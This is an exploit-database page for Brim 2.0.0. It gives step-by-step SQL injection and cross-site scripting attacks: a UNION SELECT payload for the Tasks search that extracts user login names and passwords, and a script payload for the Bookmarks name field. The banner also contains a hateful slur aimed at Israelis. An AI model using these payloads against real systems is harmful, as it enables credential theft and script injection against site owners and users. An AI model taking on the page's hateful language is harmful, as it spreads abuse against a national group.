[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Brim 2.0.0 (SQL/XSS) Multiple Remote Vulnerabilities

Author
0day Today Team
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3575
Category
web applications
Date add
29-08-2008
Platform
unsorted
====================================================
Brim 2.0.0 (SQL/XSS) Multiple Remote Vulnerabilities
====================================================



<<!>> Found by : Fisher762
                  
<<!>> Groups   : inj3ct0r

=======================================================
+++++++++++++ R3membeR Kings of injection +++++++++++++
=======================================================

<<->> script    :  Brim 2.0

=======================================================
++++++++++++++++ pWning israel fuckers ++++++++++++++++
=======================================================

<<->> D0rk    : :)
<<->> Exploit :

[SQL]

First register new acc0unt :

http://[targ3t]/brim/signup.php

then go to  y0ur email and active the acc0unt and login
 
 

after that  G0 t0 y0ur Plugins and active Tasks plugin
 
http://[Targ3t]/brim/PluginController.php
 
and finnaly go t0 search url:

http://[Targ3t]/brim/index.php?plugin=tasks&action=search
 
and insert this query in any field:

' union select 1,2,3,4,concat(loginname,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17 from brim_users/*
 
*******************************************************************************************************

[xss]
 
First active Bookmarks Plugin and add new action and in the name field insert:
 
>"><script>alert("InjEctOr Team5")</script>
  

############################################################




#  0day.today [2024-12-25]  #